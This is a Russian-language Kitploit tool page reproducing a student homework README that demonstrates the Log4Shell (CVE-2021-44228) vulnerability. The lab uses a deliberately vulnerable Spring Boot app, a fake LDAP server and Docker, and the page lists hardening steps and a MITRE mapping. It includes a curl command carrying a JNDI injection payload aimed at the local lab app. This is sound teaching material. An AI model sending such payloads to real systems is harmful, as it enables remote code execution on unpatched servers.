Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell-homework9 — Демонстрация эксплуатации уязвимости Log4Shell (CVE-2021-44228) для SEAS 8405. Включает уязвимое приложение Spring Boot, поддельный LDAP-сервер, настройку Docker, карту MITRE, реагирование на инциденты и полную запись экрана. | Kitploit
Инструменты/GitHubGitHub/serpilrivas/log4shell-homework9
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРеагирование на ИнцидентыЛаборатории и Практика
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Демонстрация эксплуатации уязвимости Log4Shell (CVE-2021-44228) для SEAS 8405. Включает уязвимое приложение Spring Boot, поддельный LDAP-сервер, настройку Docker, карту MITRE, реагирование на инциденты и полную запись экрана.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

Домашнее задание 9 – Защита систем от эксплойтов Log4Shell

Обзор

Этот проект демонстрирует эксплуатацию и устранение уязвимости Log4Shell (CVE-2021-44228) с использованием Docker-контейнера Java-веб-приложения с уязвимой версией Log4j 2.14.1. В настройки также включён симулированный вредоносный LDAP-сервер для демонстрации вектора атаки через JNDI-инъекцию.

После эксплуатации система укрепляется путём обновления Log4j, валидации входных данных и применения рекомендаций MITRE D3FEND и ATT&CK.


📁 Структура папок

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

🚀 Как запустить

1. Сборка Java-приложения (с уязвимым Log4j)

root@kitploit:~
docker build -t vulnerable-app .

2. Запуск приложения через Docker Compose

root@kitploit:~
docker-compose up

Приложение будет доступно по адресу:
http://localhost:8080

3. Запуск поддельного LDAP-сервера (в новом терминале)

root@kitploit:~
python3 ldap_server.py

4. Имитация эксплойта

Отправьте такой запрос к приложению:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

LDAP-сервер должен получить запрос (это имитирует JNDI-эксплойт).


🔒 Как система укреплена

После демонстрации атаки система была защищена путём:

  • ✅ Обновления Log4j до версии 2.17.0
  • ✅ Валидации входных данных (блокировка паттернов ${jndi:...})
  • ✅ Отключения поиска сообщений в конфигурации
  • ✅ Изоляции Docker для ограничения зоны поражения
  • ✅ Применения техник MITRE D3FEND и ATT&CK

🧬 Сопоставление с MITRE

MITRE ATT&CK:

  • T1190: Эксплуатация общедоступных приложений
  • T1210: Эксплуатация удалённых служб

MITRE D3FEND:

  • D3-IA: Валидация входных данных
  • D3-HI: Хостовая система обнаружения вторжений
  • D3-DA: Отключение небезопасных функций

📄 Отчёт

Смотрите mitigation_report.pdf для:

  • Архитектуры системы до и после
  • Объяснения Log4Shell
  • Стратегии смягчения уязвимости
  • Плана реагирования на инциденты

🎥 Видеозапись экрана

Если видео не загружено напрямую, оно доступно по ссылке в отчёте.


🧑‍💻 Автор

Serpil Rivas
SEAS 8405 – Cybersecurity Architectures
Май 2025

Скачать инструмент